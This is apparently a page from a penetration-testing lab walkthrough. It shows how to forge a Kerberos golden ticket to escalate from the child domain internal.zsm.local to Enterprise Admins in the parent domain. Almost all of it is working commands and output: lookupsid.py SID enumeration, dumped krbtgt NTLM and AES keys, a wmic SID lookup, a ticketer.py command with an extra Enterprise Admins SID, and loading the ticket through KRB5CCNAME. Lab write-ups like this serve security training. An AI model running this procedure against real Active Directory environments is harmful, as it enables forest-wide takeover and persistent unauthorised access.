Golden Ticket

Step 1: Get Child Domain SID

lookupsid.py internal.zsm.local/"melissa"@192.168.210.16

Domain SID is: S-1-5-21-3056178012-3972705859-491075245

Step 2: Get Parent Domain SID and RID for the Enterprise Admins group

lookupsid.py internal.zsm.local/"melissa"@192.168.210.10 | grep -B12 "Enterprise Admins"

Domain SID is: S-1-5-21-2734290894-461713716-141835440 519: ZSM\Enterprise Admins (SidTypeGroup)

Step 3: Get the AES key for KRBTGT account on internal.zsm.local

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0540fe51ddd618f42a66ef059ac36441:::
krbtgt:aes256-cts-hmac-sha1-96:3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0
krbtgt:aes128-cts-hmac-sha1-96:b6252a6e5ec060751a03c1a73ef2af4e
krbtgt:des-cbc-md5:92755ef7ce8a6e16

Step 4: Get RID for user Melissa (Who is now in the Domain Admins group in internal.zsm.local)

wmic useraccount where name="melissa" get sid

S-1-5-21-3056178012-3972705859-491075245-6603

Step 4: Forge Golden Ticket

ticketer.py -aesKey 3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0 -domain internal.zsm.local -domain-sid S-1-5-21-3056178012-3972705859-491075245 -extra-sid S-1-5-21-2734290894-461713716-141835440-519 -user-id 6603 melissa

Step 5: Add the ticket into the env variable

export KRB5CCNAME=melissa.ccache

Step 6: Confirm with klist

PreviousFoothold NextDouble Pivot

Last updated 9 months ago